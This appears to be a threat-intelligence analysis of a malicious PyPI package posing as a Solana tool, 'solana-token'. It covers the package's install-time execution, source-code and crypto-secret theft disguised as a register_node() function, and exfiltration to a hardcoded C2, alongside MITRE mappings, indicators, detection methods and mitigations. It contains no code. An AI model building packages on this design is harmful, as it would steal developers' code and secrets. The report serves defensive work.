Full Report
Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that purports to be an application related to the Solana blockchain, but contains malicious functionality to steal source code and developer secrets. The package, named solana-token, is no longer available for download from PyPI, but not before it was downloaded 761 times. It was first
Analysis Summary
# Tool/Technique: solana-token PyPI Package
## Overview
A malicious package published to the Python Package Index (PyPI) repository, disguised as a legitimate Solana blockchain tool (`solana-token`). Its purpose was to deceptively entice developers working on Solana-related projects to install it, subsequently stealing source code and embedded developer secrets from the compromised system.
## Technical Details
- Type: Malware (Supply Chain Compromise)
- Platform: Python environments, likely targeting developers using Linux/Unix-like systems where Python is prevalent.
- Capabilities: Source code exfiltration, theft of developer secrets, communication with a hardcoded Command and Control (C2) server.
- First Seen: Early April 2024 (First published version). Analysis reported May 13, 2025.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1195 - Supply Chain Compromise
- T1195.002 - Compromise Software Supply Chain
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Impersonation:** Poses as a legitimate Solana application package named `solana-token`.
- **Payload Execution:** Executes malicious code upon installation.
- **Data Staging:** Targets and copies source code from files within the Python execution stack.
- **Exfiltration Trigger:** The exfiltration logic is triggered under the guise of a blockchain function named `register_node()`.
### Advanced Features
- **Secret Harvesting:** Specifically designed to steal hard-coded crypto-related secrets found within the source code being exfiltrated.
- **Hardcoded C2:** Exfiltrates stolen data directly to a pre-determined IP address.
## Indicators of Compromise
- File Hashes: [N/A - Not publicly disclosed in context]
- File Names: `solana-token` (Package name)
- Registry Keys: [N/A]
- Network Indicators: Hard-coded IP address (Defanged: `[Hardcoded_C2_IP_Address]`)
- Behavioral Indicators: Unexplained execution of code during package installation; attempt to read/copy extensive source code files; outbound communication to a non-standard IP address associated with the package's execution context.
## Associated Threat Actors
- Unknown threat actors specializing in supply chain attacks targeting the cryptocurrency development ecosystem (specifically Solana developers).
## Detection Methods
- Signature-based detection: Detection rules targeting unique strings or code patterns within the `solana-token` package structure.
- Behavioral detection: Monitoring file system access patterns during package installation that indicate mass data reading/copying outside of normal package setup processes.
- YARA rules: Can be developed to detect unique function calls or C2 communication patterns associated with this specific malware logic.
## Mitigation Strategies
- Prevention measures: Aggressively monitor and vet all third-party software modules, especially packages downloaded from public repositories like PyPI, before integration into development environments.
- Hardening recommendations: Implement least privilege principles within development environments; use dependency scanning tools to check for known malicious packages; avoid using packages with suspicious versioning schemes or recently published code for critical projects.
## Related Tools/Techniques
- General PyPI/NPM/Gem Supply Chain Compromises.
- Tools designed for credential and source code theft delivered via compromised libraries.